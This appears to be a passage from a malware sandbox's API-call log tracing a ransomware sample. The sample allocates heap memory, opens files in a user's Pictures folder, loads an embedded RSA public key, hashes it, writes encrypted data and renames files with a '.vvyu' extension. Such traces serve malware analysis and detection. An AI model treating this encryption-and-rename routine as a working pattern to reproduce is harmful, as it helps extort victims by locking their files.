0x29f7dc0 [0190.436] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0dcd0 [0190.436] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0190.436] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2a0dcb8 [0190.436] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7da0 [0190.436] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2f5b18 [0190.436] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ba8 [0190.436] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f30 [0190.436] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0190.436] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0190.436] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ae8 [0190.436] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0190.436] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0190.436] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dcd0 | out: hHeap=0x2c0000) returned 1 [0190.437] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0190.437] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dcb8 | out: hHeap=0x2c0000) returned 1 [0190.437] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0190.437] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0190.437] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dd18 | out: hHeap=0x2c0000) returned 1 [0190.437] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0190.437] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9ed0 | out: hHeap=0x2c0000) returned 1 [0190.437] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aee1c8 | out: hHeap=0x2c0000) returned 1 [0190.437] GetCurrentThreadId () returned 0x5d8 [0190.437] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae00c8 [0190.437] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2ae4de8 [0190.438] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42698 [0190.438] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b9f8 [0190.438] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0190.438] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0190.438] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0190.438] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae04e8 [0190.438] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0190.438] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0190.438] GetCurrentThreadId () returned 0x5d8 [0190.438] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0190.438] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0190.438] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x2f5b18 [0190.438] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0190.439] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0190.439] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0190.439] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0190.439] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0190.439] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0190.439] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0190.439] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40108 [0190.439] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0190.439] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae03e0 [0190.439] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0190.439] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dd18 [0190.439] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0190.439] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0190.439] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0190.439] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0190.440] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0190.440] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0190.440] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0190.440] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0190.440] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dcb8 [0190.440] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0190.440] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e20 [0190.440] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0190.440] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0190.440] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0190.440] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e60 [0190.440] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0190.440] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0dcd0 [0190.440] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e60 | out: hHeap=0x2c0000) returned 1 [0190.440] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0190.440] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0190.440] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dca0 [0190.440] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0190.440] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0dd00 [0190.440] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0190.440] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7de0 [0190.440] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0190.441] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dce8 [0190.441] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0190.441] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ff348 [0190.441] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0190.441] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae5eb8 [0190.441] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ff348 | out: hHeap=0x2c0000) returned 1 [0190.441] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ff348 [0190.441] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dce8 | out: hHeap=0x2c0000) returned 1 [0190.441] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e00 [0190.441] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0190.441] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0190.441] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0190.441] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7ba8 [0190.441] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dcb8 | out: hHeap=0x2c0000) returned 1 [0190.441] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0dcb8 [0190.441] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0190.441] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2af3f88 [0190.441] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dd18 | out: hHeap=0x2c0000) returned 1 [0190.441] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0190.441] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5eb8 | out: hHeap=0x2c0000) returned 1 [0190.441] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2af4198 [0190.441] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0190.441] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x2f5b18 [0190.442] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0190.442] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0190.442] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dcb8 | out: hHeap=0x2c0000) returned 1 [0190.442] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2af43b0 [0190.442] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0190.442] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0190.442] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0190.443] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f8 | out: hHeap=0x2c0000) returned 1 [0190.443] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0190.443] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 [0190.443] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0190.443] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0190.444] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4198 | out: hHeap=0x2c0000) returned 1 [0190.444] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af43b0 | out: hHeap=0x2c0000) returned 1 [0190.444] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0190.444] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0190.444] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ff348 | out: hHeap=0x2c0000) returned 1 [0190.444] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0190.444] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dd00 | out: hHeap=0x2c0000) returned 1 [0190.444] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0190.444] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dcd0 | out: hHeap=0x2c0000) returned 1 [0190.444] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dca0 | out: hHeap=0x2c0000) returned 1 [0190.445] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0190.445] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0190.445] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae04e8 | out: hHeap=0x2c0000) returned 1 [0190.446] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dc88 | out: hHeap=0x2c0000) returned 1 [0190.446] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af31e0 | out: hHeap=0x2c0000) returned 1 [0190.446] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0190.446] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae03e0 | out: hHeap=0x2c0000) returned 1 [0190.447] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40108 | out: hHeap=0x2c0000) returned 1 [0190.447] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0190.447] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0190.447] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0190.447] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0190.448] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f30 | out: hHeap=0x2c0000) returned 1 [0190.448] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0190.448] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0190.449] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adfa00 | out: hHeap=0x2c0000) returned 1 [0190.449] WriteFile (in: hFile=0x584, lpBuffer=0x2af5168*, nNumberOfBytesToWrite=0x11b98, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x2af5168*, lpNumberOfBytesWritten=0x2f9fb14*=0x11b98, lpOverlapped=0x0) returned 1 [0190.450] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af5168 | out: hHeap=0x2c0000) returned 1 [0190.450] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x11b9d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0190.450] WriteFile (in: hFile=0x584, lpBuffer=0x2ae00c8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae00c8*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0190.450] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae00c8 | out: hHeap=0x2c0000) returned 1 [0190.451] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0190.451] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2af3f88 [0190.451] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2af3f88, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0190.451] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2af43b8 [0190.451] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0190.451] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0190.451] WriteFile (in: hFile=0x584, lpBuffer=0x2af43b8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2af43b8*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0190.452] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af43b8 | out: hHeap=0x2c0000) returned 1 [0190.452] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0190.452] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0190.452] CloseHandle (hObject=0x584) returned 1 [0190.454] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40108 [0190.454] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x2af3f88 [0190.454] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40108 | out: hHeap=0x2c0000) returned 1 [0190.454] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Pictures\\ah9z8QW.bmp" (normalized: "c:\\users\\keecfmwgj\\pictures\\ah9z8qw.bmp"), lpNewFileName="C:\\Users\\kEecfMwgj\\Pictures\\ah9z8QW.bmp.vvyu" (normalized: "c:\\users\\keecfmwgj\\pictures\\ah9z8qw.bmp.vvyu")) returned 1 [0190.455] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0190.455] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0190.455] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0190.459] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ee78 | out: hHeap=0x2c0000) returned 1 [0190.459] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e0a0be0, ftCreationTime.dwHighDateTime=0x1d8a394, ftLastAccessTime.dwLowDateTime=0x96710920, ftLastAccessTime.dwHighDateTime=0x1d8a432, ftLastWriteTime.dwLowDateTime=0x96710920, ftLastWriteTime.dwHighDateTime=0x1d8a432, nFileSizeHigh=0x0, nFileSizeLow=0x17ca5, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Br-Ix6cU0omQu4 DZyj.png", cAlternateFileName="BR-IX6~1.PNG")) returned 1 [0190.459] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af31e0 [0190.459] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbb48 [0190.459] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af31e0 | out: hHeap=0x2c0000) returned 1 [0190.459] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Pictures\\Br-Ix6cU0omQu4 DZyj.png") returned=".png" [0190.459] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\Br-Ix6cU0omQu4 DZyj.png" (normalized: "c:\\users\\keecfmwgj\\pictures\\br-ix6cu0omqu4 dzyj.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0190.460] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=97445) returned 1 [0190.461] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0190.463] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x17c7f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0190.463] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0190.465] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0190.465] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0190.465] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0190.465] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0x17ca5, lpOverlapped=0x0) returned 1 [0190.467] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0190.467] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0190.467] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0190.467] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0190.467] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31b9f8) returned 1 [0190.468] CryptCreateHash (in: hProv=0x31b9f8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0190.468] CryptHashData (hHash=0x2a05de8, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0190.468] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0190.468] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0190.468] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0190.468] GetLastError () returned 0x0 [0190.468] CryptDestroyHash (hHash=0x2a05de8) returned 1 [0190.468] CryptReleaseContext (hProv=0x31b9f8, dwFlags=0x0) returned 1 [0190.469] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0190.469] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0190.469] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0190.469] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0190.469] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0190.469] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0190.469] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0190.469] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x17cb0) returned 0x2af5168 [0190.470] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0190.470] HeapFree (in: 